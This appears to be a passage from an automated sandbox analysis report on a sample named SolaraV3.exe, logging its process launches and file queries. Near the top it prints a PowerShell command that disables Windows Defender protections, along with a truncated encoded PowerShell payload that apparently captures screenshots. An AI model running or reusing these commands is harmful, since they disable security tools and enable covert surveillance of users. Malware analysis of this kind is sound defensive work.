Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

110_2_00007FF74EEBB340

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC729570 cpuid

1_2_00007FF6DC729570

Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
